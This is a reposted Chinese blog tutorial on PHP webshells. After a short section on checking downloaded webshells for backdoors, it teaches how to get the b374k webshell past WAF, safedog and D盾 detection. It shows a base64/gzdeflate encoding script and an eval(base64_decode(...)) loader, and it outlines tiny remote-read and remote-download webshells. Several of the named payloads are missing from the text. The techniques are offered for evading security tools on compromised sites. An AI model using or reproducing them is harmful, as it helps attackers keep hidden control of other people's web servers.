内容简介:本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!常见
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!
Part 1
Part 2
大马后门检查: Fiddler
抓包
审计代码
这里我以 http://webshell8.com/ 这里的大马为例子演示
修改并运行脚本
Burp
抓包或者右键查看原代码
修改并运行代码
再使用 Burp
抓个包
查找关键字 GetHtml
hmlogin
localhost
等
把上图的 base64
代码解密下
Part 3
大马源码免杀
这里我使用的是国外的一款大马 b374k
来进行免杀。
执行代码 eval
或 preg_replace的/e修饰符
来执行大马代码。
$a = 'phpinfo();'; eval($a); //eval执行 php 代码
编码
如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。
$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径 $encode = base64_encode(gzdeflate($code)); //加密函数自己修改就行 echo $encode; //输出加密后代码
在线加解密码 点这里
这里我先将b374k的源码去掉 <?php ?>
后, base64
加密
解码
通过解码执行我们的代码。
那我们来试试解码并执行刚刚base64加密的大马。
<?php eval(base64_decode('刚刚加密的代码')); ?>
关键字免杀
// 类型这样的关键字如果没有混淆拆分是过不了waf的 eval(base64_decode('code')); // 我们需要做的就是关键字免杀
免杀 payload 1
过狗过D盾 注意: code
就是我们刚刚 加密的base64
代码。
免杀
D盾规则库
免杀 payload 2
总结,源码免杀就到这里了,其实只需要些php基础,轻松免杀。
Part 4
只有几百字节的大马
首先我们需要了解,几百字节是什么概念 1kb
=
1024b
那么我们怎么实现呢,2种思路 远程读取
和 远程下载
远程读取
payload 3
上传txt
免杀
payload 4
免杀
远程下载
payload 5
免杀
大小
最小的一百多字节,其他2个两百多字节那样子。
喜欢这篇文章的话就点一点 喜欢 吧!
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 对于某个PHP大马的分析
- 带你走进php大马的结构模块编写之路
- 渗透技巧之Powershell实战技巧
- 渗透技巧——快捷方式文件的参数隐藏技巧
- Python实用技巧,你不知道的7个好玩的Python技巧
- Python 技巧总结
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
x86/x64体系探索及编程
邓志 / 电子工业出版社 / 2012-10-1 / 119.00元
本书是对Intel手册所述处理器架构的探索和论证。全书共五大部分,从多个方面对处理器架构相关的知识进行了梳理介绍。书中每个章节都有相应的测试实验,所运行的实验例子都可以在真实的机器上执行。 通过阅读本书,读者应能培养自己动手实验的能力。如果再有一些OS方面的相关知识,基本上就可以写出自己简易的OS核心。 本书适合有一定的x86基础知识,且对了解处理器架构及编程感兴趣的读者阅读。一起来看看 《x86/x64体系探索及编程》 这本书的介绍吧!